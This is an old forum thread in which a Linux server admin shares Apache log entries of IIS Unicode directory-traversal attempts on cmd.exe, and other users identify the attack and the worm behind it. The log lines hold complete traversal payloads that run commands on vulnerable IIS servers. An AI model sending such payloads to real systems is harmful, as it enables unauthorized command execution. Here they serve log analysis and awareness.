cmd.exe exploit? (but I run Linux)


nanode
06-12-2001, 02:35 PM
check this:

anode@stout:/usr/local/apache/logs$ grep cmd.exe *
access_log:207.213.220.70 - - [07/Apr/2001:06:26:00 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 322
access_log:200.195.224.3 - - [02/Jun/2001:17:30:05 -0700] "HEAD /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0
error_log:[Sat Apr 7 06:26:00 2001] [error] [client 207.213.220.70] File does not exist: /usr/local/apache/htdocs/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 2 17:30:05 2001] [error] [client 200.195.224.3] File does not exist: /usr/local/apache/htdocs/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe


On an NT box, would this give up an "admin" dos shell or something?

Jason Deraleau
06-12-2001, 03:16 PM
Originally posted by nanode:
check this:

anode@stout:/usr/local/apache/logs$ grep cmd.exe *
access_log:207.213.220.70 - - [07/Apr/2001:06:26:00 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 322
access_log:200.195.224.3 - - [02/Jun/2001:17:30:05 -0700] "HEAD /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0
error_log:[Sat Apr 7 06:26:00 2001] [error] [client 207.213.220.70] File does not exist: /usr/local/apache/htdocs/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 2 17:30:05 2001] [error] [client 200.195.224.3] File does not exist: /usr/local/apache/htdocs/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe


On an NT box, would this give up an "admin" dos shell or something?

I imagine at best it would let you download cmd.exe, which is pretty useless. Kinda like downloading the bash executable.

JD

r00t619
06-12-2001, 03:56 PM
nanode,

You need to keep up on your security, ole buddy. This is an OLD exploit from October 2000 that went around and has become very mainstream in the last month or so. Remember when China was hacking the US because of the damn plane landing in their country? Well, they began hacking US computers with a worm that exploits Solaris machines running sadmind; from there the infected Solaris machine attempts to scan for IIS servers and run the Unicode exploit on them, overwriting the default DirectoryIndex files with:
"FSCK THE US GOVERNMENT FSCK POISON CLAN"

This was such an outbreak that it caused one of the truly great defacement archive sites, http://www.attrition.org, to call it quits because it couldn't keep up. There were over 10,000 hacked sites in a period of about a month.

Here is the Bugtraq Info on the Unicode attack you received on your machine if you want to learn more:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1806

I bet both of those machines that were attacking you are just r00ted Solaris boxes.

Lemme know if ya need anymore help :D

nanode
06-12-2001, 04:08 PM
r00t619:

Thanks for the update. <sarcasm>I'm not in the habit of reading NT exploits since I don't run it on any personal machines.</sarcasm> :)

I should create a bogus directory structure to mimic WinNT. In that dir, place a plain text file named cmd.exe; the contents will be something offensive.

If that's a completely ridiculous idea, let me know ;)

Craig McPherson
06-12-2001, 07:26 PM
"FSCK THE US GOVERNMENT FSCK POISON CLAN"

It's kind of funny that Chinese script-kiddies speak better English than most American or English script-kiddies do.

optech
06-13-2001, 10:29 AM
what you say?!??